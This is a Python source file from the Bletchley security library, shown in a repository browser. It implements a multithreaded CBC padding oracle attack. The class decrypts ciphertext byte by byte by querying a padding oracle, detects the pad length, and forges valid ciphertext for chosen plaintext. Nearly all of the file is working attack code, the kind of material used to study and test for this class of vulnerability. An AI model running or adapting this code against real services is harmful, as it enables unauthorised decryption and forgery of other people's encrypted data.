source: trunk/lib/bletchley/CBC/__init__.py

Last change on this file was 119, checked in by tim, 8 years ago

comments

File size: 17.0 KB
Line 
1'''
2Created on Jul 4, 2010
3
4Copyright (C) 2010 ELOI SANFÈLIX
5Copyright (C) 2012-2015 Timothy D. Morgan
6@author: Eloi Sanfelix < eloi AT limited-entropy.com >
7@author: Timothy D. Morgan < tmorgan {a} vsecurity . com >
8
9 This program is free software: you can redistribute it and/or modify
10 it under the terms of the GNU Lesser General Public License, version 3,
11 as published by the Free Software Foundation.
12
13 This program is distributed in the hope that it will be useful,
14 but WITHOUT ANY WARRANTY; without even the implied warranty of
15 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
16 GNU General Public License for more details.
17
18 You should have received a copy of the GNU General Public License
19 along with this program.  If not, see <http://www.gnu.org/licenses/>.
20'''
21
22import random
23import struct
24import threading
25from .. import buffertools
26from .Exceptions import *
27
class POA:
    """This class implements padding oracle attacks given a ciphertext and
    function that acts as a padding oracle.

    The padding scheme is assumed to be PKCS#5/#7, also defined in RFC2040.
    This attack was first described in:
     "Security Flaws Induced by CBC Padding. Applications to SSL, IPSEC,
      WTLS" by Serge Vaudenay (2002)

    POA objects are not caller thread-safe.  If multiple threads need to work
    simultaneously on the same ciphertext and oracle, create a
    separate instance. POA objects can execute tasks internally using
    multiple threads, however.

    """

    ## private
    # Byte value found by a worker thread during the current probe (or None)
    _thread_result = None
    _oracle = None
    _ciphertext = None
    _iv = None

    ## protected (reading ok, changing not ok)
    block_size = None

    ## public (r/w ok)
    # Number of additional attempts made when a byte cannot be determined
    retries = 2
    # Tail of the plaintext recovered so far (including the pad)
    decrypted = None
    threads = None
    log_fh = None

    def __init__(self, oracle, block_size, ciphertext, iv=None,
                 threads=1, decrypted=b'', log_file=None):
        """Creates a new padding oracle attack (POA) object.

        Arguments:
        oracle -- A function which returns True if the given ciphertext
         results in a correct padding upon decryption and False
         otherwise.  This function should implement the prototype:
           def myOracle(ciphertext, iv): ...
         If the initialization vector (iv) is unknown or not included in
         the ciphertext message, it can be ignored in your oracle
         implementation (though some limitations will result from this).

        block_size -- The block size of the ciphertext being attacked.
         Is almost always 8 or 16.

        ciphertext -- The ciphertext to be decrypted

        iv -- The initialization vector associated with the ciphertext.
         If none provided, it is assumed to be a block of 0's

        threads -- The maximum number of parallel threads to use during
         decryption.  If more than one thread is used, then the oracle
         function will be called in parallel.  It should implement any
         internal locking necessary to prevent race conditions where
         applicable.

        decrypted -- If a portion of the plaintext is already known (due
         to a prior, partially successful decryption attempt), then this
         may be used to restart the decryption process where it was
         previously left off.  This argument is assumed to contain the
         final N bytes (for an N-byte argument) of the plaintext; that
         is, the tail of the plaintext including the pad.

        log_file -- A Python file object where log messages will be
         written.

        Raises:
        InvalidBlockError -- if the ciphertext or IV length is not a
         multiple of block_size, or the ciphertext is shorter than one
         block.
        Exception -- if more decrypted bytes are supplied than there are
         ciphertext bytes.

        """

        if len(ciphertext) % block_size != 0 or len(ciphertext) < block_size:
            raise InvalidBlockError(block_size, len(ciphertext))
        if iv is not None and len(iv) % block_size != 0:
            raise InvalidBlockError(block_size, len(iv))
        if len(decrypted) > len(ciphertext):
            #XXX: custom exception
            raise Exception("Known plaintext (%d bytes) is longer than the ciphertext (%d bytes)"
                            % (len(decrypted), len(ciphertext)))

        self.block_size = block_size
        self.decrypted = decrypted
        self.threads = threads
        self.log_fh = log_file

        self._oracle = oracle
        self._ciphertext = ciphertext
        if iv is None:
            self._iv = b'\x00' * self.block_size
        else:
            self._iv = iv


    def log_message(self, s):
        """Writes the message s to the log file, if one was configured."""
        if self.log_fh is not None:
            self.log_fh.write('BLETCHLEY: %s\n' % s)


    def probe_padding(self):
        """Attempts to verify that a CBC padding oracle exists and then determines the
        pad value.

        Returns the pad string, or None on failure.
        XXX: Currently only works for PKCS 5/7.
        """

        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)
        final = blocks[-1]
        if len(blocks) == 1:
            # If only one block present, then try to use IV as prior
            prior = self._iv
        else:
            prior = blocks[-2]

        ret_val = None
        # First probe for beginning of pad: corrupt each byte of the prior
        # block from left to right (the final byte is never tested) until
        # the oracle first rejects the message.  If it never does, a pad
        # length of 1 is suspected.
        pad_length = 1
        for i in range(-self.block_size, -1):
            tweaked = struct.pack("B", prior[i] ^ 0xFF)
            if not self._oracle(self._ciphertext + prior[:i] + tweaked + prior[i+1:] + final, self._iv):
                pad_length = -i
                break

        self.log_message("Testing suspected pad length: %d" % pad_length)
        if pad_length > 1:
            # XXX: If this test case fails, we should try instead
            # lengthening the pad by one byte with all 256 values (as is
            # done in the 1-byte pad case).
            #
            # Verify suspected pad length by changing last pad byte to 1
            # and making sure the padding succeeds
            tweaked = struct.pack("B", prior[-1] ^ (pad_length ^ 1))

            #XXX: This replaces the pad bytes with spaces.  The hope is
            #     that any UTF-8 decoding errors that the pad bytes
            #     might generate are addressed this way.  It is not yet
            #     well tested.  An option should be added to allow other
            #     bytes to be used or to turn off the behavior.
            # Only the pad positions (other than the final byte, which is
            # handled by `tweaked`) are rewritten; bytes before the pad
            # hold real plaintext and are left untouched.
            masked = bytearray(prior)
            for q in range(-pad_length, -1):
                masked[q] ^= pad_length ^ 32 # space

            if self._oracle(self._ciphertext + masked[:-1] + tweaked + final, self._iv):
                ret_val = buffertools.pkcs7Pad(pad_length)

        else:
            # Verify by changing pad byte to 2 and brute-force changing
            # second-to-last byte to 2 as well
            tweaked = struct.pack("B", prior[-1] ^ (2 ^ 1))
            for j in range(1, 256):
                guess = struct.pack("B", prior[-2] ^ j)
                if self._oracle(self._ciphertext + prior[:-2] + guess + tweaked + final, self._iv):
                    # XXX: Save the decrypted byte for later
                    ret_val = buffertools.pkcs7Pad(pad_length)
                    # Pad confirmed; no need to keep querying the oracle
                    break

        return ret_val


    # XXX: This could be generalized as a byte probe utility for a variety of attacks
    def _test_value_set(self, prefix, suffix, value_set):
        """Queries the oracle with prefix+<byte>+suffix for each byte value
        in value_set, storing the first accepted value in
        self._thread_result.  Intended to run as a worker thread.

        """
        for b in value_set:
            if self._thread_result is not None:
                # Stop if another thread found the result
                break
            if self._oracle(prefix + struct.pack("B", b) + suffix, self._iv):
                self._thread_result = b
                break


    def decrypt_next_byte(self, prior, block, known_bytes, cache=True):
        """Decrypts one byte of ciphertext by modifying the prior
        ciphertext block at the same relative offset.

        Arguments:
        prior -- Ciphertext block appearing prior to the current target
        block -- Currently targeted ciphertext block
        known_bytes -- Bytes in this block already decrypted
        cache -- If true, the newly decrypted byte is also prepended to
         self.decrypted

        Returns the newly decrypted byte followed by known_bytes (or
        known_bytes unchanged if the block is already fully decrypted).

        Raises:
        InvalidBlockError -- if block is not exactly block_size bytes
        Exception -- if no byte value is accepted by the oracle, even
         after the configured number of retries

        """

        # XXX: If the second-to-last byte of a block happens to be 0x02
        #      then changing the final byte to either 0x01 or 0x02 would
        #      cause no error to be generated by the oracle.  Need to
        #      handle that corner case.  This doesn't occur on any other
        #      offset, since we'll have already set the previously
        #      decrypted bytes to a specific pad value, eliminating the
        #      ambiguity.

        if len(block) != self.block_size:
            raise InvalidBlockError(self.block_size, len(block))
        num_known = len(known_bytes)

        if num_known >= self.block_size:
            return known_bytes

        # The pad value we are trying to produce in the plaintext tail
        pad_value = num_known + 1
        target = self.block_size - pad_value
        prior_prefix = prior[0:target]
        base = prior[target]
        # Adjust known bytes to appear as a PKCS 7 pad
        suffix = bytes(prior[i - num_known] ^ known_bytes[i] ^ pad_value
                       for i in range(num_known)) + block

        # XXX: catch any signal exceptions, such as ^C, and communicate
        #      this back to the rest of the script so it can end immediately
        for attempt in range(1 + self.retries):
            # Each thread spawned searches a subset of the next byte's
            # 256 possible values
            self._thread_result = None
            workers = []
            for i in range(self.threads):
                t = threading.Thread(target=self._test_value_set,
                                     args=(self._ciphertext + prior_prefix, suffix,
                                           range(i, 256, self.threads)))
                t.start()
                workers.append(t)

            for t in workers:
                t.join()

            if self._thread_result is not None:
                break

            # If a byte fails to decrypt, it could be because the prior
            # block's decrypted value violates UTF-8 decoding rules, or
            # because it randomly introduced a delimiter that causes
            # problems.  If retries are enabled, we insert an additional
            # random block before the prior block so that the decrypted
            # value can be changed.
            if attempt < self.retries:
                self.log_message("Value of a byte could not be determined. Retrying...")
                # XXX: Instead of adding a new random block to the
                #      beginning every time, would be better to just keep
                #      randomizing the same block before the original
                #      prior_prefix.
                prior_prefix = bytes([random.getrandbits(8) for i in range(self.block_size)]) + prior_prefix

        if self._thread_result is None:
            self.log_message("Value of a byte could not be determined.  Current plaintext suffix: "+ repr(self.decrypted))
            #XXX: custom exception
            raise Exception("Value of a byte could not be determined")

        decrypted = struct.pack("B", self._thread_result ^ base ^ pad_value)
        if cache:
            self.decrypted = decrypted + self.decrypted
        #  Return previous bytes together with current byte
        return decrypted + known_bytes


    def decrypt_block(self, prior, block, last_bytes=b'', cache=True):
        """Decrypts the block of ciphertext provided as a parameter.

        Arguments:
        prior -- Ciphertext block (or IV) preceding the target block
        block -- Ciphertext block to decrypt
        last_bytes -- Trailing plaintext bytes of this block that are
         already known
        cache -- Passed through to decrypt_next_byte()

        Returns the plaintext of the block.

        """

        # Use '<' rather than '!=' so that an over-long last_bytes cannot
        # cause an endless loop (decrypt_next_byte returns it unchanged).
        while len(last_bytes) < self.block_size:
            last_bytes = self.decrypt_next_byte(prior, block, last_bytes, cache)

        self.log_message("Decrypted block: %s" % repr(last_bytes))
        return last_bytes


    def decrypt(self):
        """Decrypts the previously supplied ciphertext. If the IV was
        not provided, it assumes a IV of zero bytes.

        Returns the result of buffertools.stripPKCS7Pad() applied to the
        recovered plaintext.  Raises Exception if the pad length cannot
        be determined.

        """

        if not self.decrypted:
            # First decrypt the padding (quick to decrypt and good sanity check)
            pad_bytes = self.probe_padding()
            if pad_bytes is None:
                # XXX: custom exception
                self.log_message("Could not determine pad length")
                raise Exception("Could not determine pad length")

            self.decrypted = pad_bytes


        # Start where we left off last, whether that be with just a pad,
        # or with additional decrypted blocks.

        # number of bytes in any partially decrypted blocks
        num_partial = len(self.decrypted) % self.block_size

        # number of blocks fully decrypted
        finished_blocks = len(self.decrypted) // self.block_size

        # contents of the partial block
        partial = self.decrypted[0:num_partial]

        # contents of fully decrypted blocks
        decrypted = self.decrypted[num_partial:]

        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)

        # Start with the partially decrypted block at the end, and work
        # our way to the front.  Don't decrypt the very first block of
        # the ciphertext yet.
        for i in range(len(blocks) - 1 - finished_blocks, 0, -1):
            decrypted = self.decrypt_block(blocks[i-1], blocks[i], partial) + decrypted
            partial = b''

        # Finally decrypt first block
        if finished_blocks < len(blocks):
            decrypted = self.decrypt_block(self._iv, blocks[0], partial) + decrypted

        # Remove the padding and return
        return buffertools.stripPKCS7Pad(decrypted, self.block_size, self.log_fh)


    def encrypt_block(self, plaintext, ciphertext):
        """Encrypts a block of plaintext.  This is accomplished by
        decrypting the supplied ciphertext and then computing the prior
        block needed to create the desired plaintext at the ciphertext's
        location.

        Returns the calculated prior block and the provided ciphertext
        block as a tuple.

        Raises InvalidBlockError if plaintext and ciphertext are not both
        exactly one block long.

        """
        if len(plaintext) != self.block_size or len(plaintext) != len(ciphertext):
            raise InvalidBlockError(self.block_size, len(plaintext))

        # With an all-zero prior block, the "plaintext" recovered is the
        # raw block-cipher output for this ciphertext block.
        ptext = self.decrypt_block(b'\x00' * self.block_size, ciphertext, cache=False)
        prior = buffertools.xorBuffers(ptext, plaintext)
        self.log_message("Encrypted block: %s to %s with prior %s" % (repr(plaintext),
                                                                      repr(bytes(ciphertext)),
                                                                      repr(bytes(prior))))
        return prior, ciphertext


    def encrypt(self, plaintext, ciphertext=None):
        """Encrypts a plaintext value through "CBC-R" style prior-block
        propagation.

        Arguments:
        plaintext -- The (unpadded) plaintext to encrypt
        ciphertext -- Optional output of a previous, partially completed
         encrypt() run (prior block followed by finished ciphertext
         blocks), used to resume where that run left off

        Returns a tuple of the IV and ciphertext.  If a block fails to
        encrypt, the failure is logged and the partial result computed so
        far is returned.

        NOTE: If your target messages do not include an IV with the
        ciphertext, you can instead opt to encrypt a suffix of the
        message and include the IV in the middle of the ciphertext as
        if it were an encrypted block. This one block alone will decrypt
        to an uncontrollable random value, but with careful placement,
        this might be ok.

        """

        blocks = buffertools.splitBuffer(buffertools.pkcs7PadBuffer(plaintext, self.block_size),
                                         self.block_size)
        if ciphertext not in (None, b''):
            if len(ciphertext) % self.block_size != 0:
                raise InvalidBlockError(self.block_size, len(ciphertext))

            cblocks = buffertools.splitBuffer(ciphertext, self.block_size)
            prior = cblocks[0]

            # remove first block from ciphertext since it'll be re-added later
            # after the prior is converted to finished ciphertext.
            del cblocks[0]
            ciphertext = b''.join(cblocks)

            # now remove the plaintext blocks we've already completed
            # (clamped at 0 so that an over-long ciphertext cannot turn
            # into a negative, wrap-around slice index)
            num_finished = len(cblocks)
            del blocks[max(0, len(blocks) - num_finished):]
            self.log_message("Reusing previous decryption of final %d blocks" % num_finished)

        elif (len(self.decrypted) >= self.block_size
            and len(self._ciphertext) >= 2*self.block_size):

            self.log_message("Reusing previous decryption of final block")

            # If possible, reuse work from prior decryption efforts on original
            # message for last block
            old_prior = self._ciphertext[0-self.block_size*2:0-self.block_size]
            final_plaintext = self.decrypted[0-self.block_size:]
            prior = buffertools.xorBuffers(old_prior,
                                           buffertools.xorBuffers(final_plaintext, blocks[-1]))
            ciphertext = self._ciphertext[0-self.block_size:]
            del blocks[-1]
        else:
            self.log_message("Starting decryption from scratch with random final block")

            # Otherwise, select a random last block and generate the prior block
            prior = bytes([random.getrandbits(8) for i in range(self.block_size)])
            ciphertext = b''

        self.log_message("Encrypting %d blocks..." % len(blocks))
        try:
            # Continue generating all prior blocks
            for i in range(len(blocks) - 1, -1, -1):
                prior, cblock = self.encrypt_block(blocks[i], prior)
                ciphertext = cblock + ciphertext
        except Exception as e:
            # Deliberately best-effort: report the failure and hand back
            # the partial result so that it can be passed in again via
            # the ciphertext argument to resume.
            self.log_message("Encryption failure. prior+ciphertext: %s" % repr(prior+ciphertext))
            self.log_message("Encryption failure cause: %s" % repr(e))

        # prior as IV
        return prior, ciphertext
Note: See TracBrowser for help on using the repository browser.